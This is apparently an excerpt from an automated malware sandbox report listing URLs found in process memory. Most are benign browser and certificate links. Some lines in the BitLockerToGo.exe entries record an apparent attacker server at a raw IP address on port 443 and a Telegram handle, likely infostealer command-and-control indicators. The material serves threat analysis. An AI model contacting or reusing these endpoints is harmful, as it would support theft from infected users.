                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                  Source: N11R7lRasm.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: N11R7lRasm.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
                  Source: N11R7lRasm.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
                  Source: N11R7lRasm.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: N11R7lRasm.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: N11R7lRasm.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: N11R7lRasm.exeString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
                  Source: N11R7lRasm.exeString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                  Source: N11R7lRasm.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: N11R7lRasm.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: N11R7lRasm.exeString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0=
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                  Source: chrome.exe, 00000007.00000003.1975477083.00005AF0010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975538792.00005AF000FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974996191.00005AF000F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975588365.00005AF001114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                  Source: N11R7lRasm.exeString found in binary or memory: http://ocsp.digicert.com0
                  Source: N11R7lRasm.exeString found in binary or memory: http://ocsp.digicert.com0A
                  Source: N11R7lRasm.exeString found in binary or memory: http://ocsp.digicert.com0C
                  Source: N11R7lRasm.exeString found in binary or memory: http://ocsp.digicert.com0W
                  Source: N11R7lRasm.exeString found in binary or memory: http://ocsp.digicert.com0X
                  Source: chrome.exe, 00000007.00000003.1975477083.00005AF0010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975538792.00005AF000FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976535112.00005AF00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974996191.00005AF000F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976498151.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976923293.00005AF00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975588365.00005AF001114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976472737.00005AF000730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976450217.00005AF000D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976999250.00005AF00127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975516214.00005AF001148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976789017.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                  Source: chrome.exe, 00000007.00000003.1975477083.00005AF0010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975538792.00005AF000FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976535112.00005AF00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974996191.00005AF000F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976498151.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976923293.00005AF00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975588365.00005AF001114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976472737.00005AF000730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976450217.00005AF000D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976999250.00005AF00127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975516214.00005AF001148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976789017.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                  Source: chrome.exe, 00000007.00000003.1975477083.00005AF0010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975538792.00005AF000FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976535112.00005AF00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974996191.00005AF000F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976498151.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976923293.00005AF00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975588365.00005AF001114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976472737.00005AF000730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976450217.00005AF000D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976999250.00005AF00127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975516214.00005AF001148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976789017.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                  Source: chrome.exe, 00000007.00000003.1975477083.00005AF0010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975538792.00005AF000FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976535112.00005AF00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974996191.00005AF000F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976498151.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976923293.00005AF00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975588365.00005AF001114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976472737.00005AF000730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976450217.00005AF000D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976999250.00005AF00127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975516214.00005AF001148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976789017.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                  Source: N11R7lRasm.exeString found in binary or memory: http://www.digicert.com/CPS0
                  Source: BitLockerToGo.exe, 00000003.00000003.1934326719.0000000000CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/
                  Source: BitLockerToGo.exe, 00000003.00000003.1920673890.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1934326719.0000000000CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/03
                  Source: BitLockerToGo.exe, 00000003.00000003.1877513009.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1891805185.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1906846457.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1920673890.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1934326719.0000000000CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/73
                  Source: BitLockerToGo.exe, 00000003.00000003.1934326719.0000000000CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/D3G
                  Source: BitLockerToGo.exe, 00000003.00000003.1920673890.0000000000CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/K
                  Source: BitLockerToGo.exe, 00000003.00000003.1906846457.0000000000CA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/a3$
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/v
                  Source: BitLockerToGo.exe, 00000003.00000003.1906846457.0000000000CA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/v3Q
                  Source: BitLockerToGo.exe, 00000003.00000003.1934326719.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1934326719.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222:443
                  Source: BitLockerToGo.exe, 00000003.00000003.1920673890.0000000000CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222:443FR_
                  Source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000003.1850814860.000000000AC3C000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222:443hello
                  Source: BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222:443hellohttps://t.me/b4cha00oomaino5Mozilla/5.0
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
                  Source: chromecache_477.9.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
                  Source: chromecache_477.9.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                  Source: chrome.exe, 00000007.00000003.1994237299.00005AF001470000.00000004.00000800.00020000.00000000.sdmp, chromecache_477.9.dr, chromecache_478.9.drString found in binary or memory: https://apis.google.com
